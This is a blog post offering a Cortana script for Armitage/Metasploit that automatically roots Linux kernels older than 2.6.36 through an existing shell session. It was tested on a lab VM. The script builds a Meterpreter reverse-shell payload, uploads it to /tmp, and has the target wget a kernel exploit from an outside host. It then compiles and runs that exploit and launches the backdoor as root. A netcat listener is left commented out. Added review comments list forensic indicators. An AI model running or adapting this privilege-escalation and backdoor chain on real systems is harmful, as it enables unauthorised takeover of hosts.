Posted by Security is just an illusion at Wednesday, January 22, 2014
Here is a very simple Cortana script I wrote for auto-rooting Linux kernels < 2.6.36.
Tested on Hackademic.RTB1 : Demo
# Auto Rooting < 2.6.36 Menu for Cobalt Engine v0.1
# Cortana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
#debug(7);
# Adds an "Auto Rooting" submenu to the popup menu of a shell session.
# $1 is handed to session_host(), shell_upload() and s_cmd() below, so it is
# presumably the id of the shell session the menu was opened on - TODO confirm.
#
# NOTE(review): every step is fire-and-forget. Nothing checks that the
# download, the compile, the privilege escalation or the upload succeeded
# before the next command is sent to the shell.
#
# Artifacts the visible commands leave on the target host (useful as
# detection / forensic indicators when reviewing a lab run):
#   - 44219.c and rootme_1 in the shell's current working directory
#   - /tmp/linux_backdoor_<port>, set to mode 0777
#   - a wget fetch of a .c file over plain HTTP, followed by a gcc run
popup shell {
# Only offer the menu when the session's host is recorded as Linux.
if (host_os(session_host($1)) eq "Linux") {
menu "Auto Rooting" {
item "Auto Rooting < 2.6.36" {
println("Auto Rooting");
# Build an ELF linux/x86 reverse_tcp Meterpreter payload that calls back to
# lhost() on a randomly chosen port.
$r_lport = random_port();
$backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
# Stage the payload in /tmp/linux_backdoor_<port> (openf presumably writes on
# the machine running this script - TODO confirm), then upload it to the same
# path on the target. The file name is predictable apart from the port number.
$handle2 = openf(">/tmp/linux_backdoor_$r_lport");
writeb($handle2, $backdoor);
closef($handle2);
shell_upload($1, "/tmp/linux_backdoor_$r_lport", "/tmp/linux_backdoor_$r_lport");
# Start a listener for that payload on the same port.
handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(LHOST => lhost()));
# Have the target download C source from a third-party host, compile it with
# gcc and run the result.
# NOTE(review): the source is fetched over plain HTTP with no hash or
# signature check, so whatever that URL serves at run time is compiled and
# executed on the target. The step depends on outbound HTTP and on a compiler
# being present, so egress filtering or a host without gcc stops it here.
s_cmd($1, "wget http://downloads.securityfocus.com/vulnerabilities/exploits/44219.c");
s_cmd($1, "gcc 44219.c -o rootme_1");
# chmod +x is redundant with the 0777 that follows; 0777 also leaves the
# binary world-writable.
s_cmd($1, "chmod +x rootme_1");
s_cmd($1, "chmod 0777 rootme_1");
s_cmd($1, "./rootme_1");
# Fixed 10 second wait. The script assumes the shell is running as root
# afterwards but never verifies it; the chown root:root below only works if
# that assumption holds.
sleep(10 * 1000);
# Make the uploaded payload executable (again world-writable via 0777),
# change its owner to root, and run it from the shell.
s_cmd($1, "chmod +x /tmp/linux_backdoor_$r_lport");
s_cmd($1, "chmod 0777 /tmp/linux_backdoor_$r_lport");
s_cmd($1, "chown root:root /tmp/linux_backdoor_$r_lport");
s_cmd($1, "/tmp/linux_backdoor_$r_lport");
# Send "exit" to the shell, then call db_sync() (presumably so the script's
# view of the database is refreshed - TODO confirm).
s_cmd($1, "exit");
db_sync();
# Disabled alternative, left commented out by the author: a netcat listener
# on port 31337 on the target, paired with a console-driven multi/handler
# using the cmd/unix/bind_netcat payload.
#s_cmd($1, "nc -lvp 31337");
#cmd($console, "use exploit/multi/handler");
#cmd($console, "set LPORT 31337");
#$host = session_host($1);
#cmd($console, "set RHOST $host");
#cmd($console, "set PAYLOAD cmd/unix/bind_netcat");
#cmd($console, "set ExitOnSession false");
#cmd($console, "exploit -j");
}
}
}
}
Have pfun